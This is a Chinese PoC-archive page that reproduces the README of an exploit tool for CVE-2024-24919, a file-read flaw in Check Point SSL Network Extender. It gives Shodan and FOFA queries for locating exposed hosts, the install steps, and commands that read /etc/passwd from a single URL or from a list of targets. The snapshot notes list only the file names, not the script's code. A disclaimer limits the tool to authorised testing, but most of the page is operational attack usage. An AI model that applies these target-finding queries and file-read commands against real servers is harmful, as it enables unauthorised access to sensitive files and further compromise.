关联漏洞
介绍
# CVE-2024-24919 Exploit
**CVE Identifier:** CVE-2024-24919
**Vulnerability Type:** Local File Inclusion (LFI)
**Severity:** High
**CVSS Score:** 7.5 (High)
# Overview:
CVE-2024-24919 is a Local File Inclusion (LFI) vulnerability present in certain web applications.
This vulnerability allows an attacker to read files from the server by manipulating the file path input parameter.
By exploiting this flaw, an attacker can gain access to sensitive files on the server, such as configuration files, password files, and other critical data, leading to information disclosure and potential further compromise.
# Affected Software:
Check Point SSL Network Extender
# Queries to find vulnrable hosts
1. Shodan
"Server: Check Point SVN"
2. fofa
title=="Check Point SSL Network Extender"
# Usage
intall exploit
`git clone https://github.com/gurudattch/CVE-2024-24919`
install requirements
`pip install -r requirments.txt`
Check a Single URL
To check a single URL for the vulnerability:
`python cve-2024-24919.py -u "http://example.com" -d "/etc/passwd"`
Check Multiple URLs from a File
`python cve-2024-24919.py -f "urls.txt" -d "/etc/passwd"`
Arguments
```
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL to check for vulnerability
-f FILE, --file FILE File containing multiple URLs to check
-d DATA, --data DATA Data to send in the request (eg. /etc/passwd)
-r {y,n}, --response {y,n} Print Response Or Not
```
# Disclaimer
This script is intended for educational purposes and should only be used to test systems you own or have permission to test. Unauthorized use of this script against systems without permission is illegal.
文件快照
[4.0K] /data/pocs/4cfe5dff6e3096e4dca82164ba49c6a50d461140
├── [3.2K] cve-2024-24919.py
├── [1.7K] README.md
└── [ 69] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。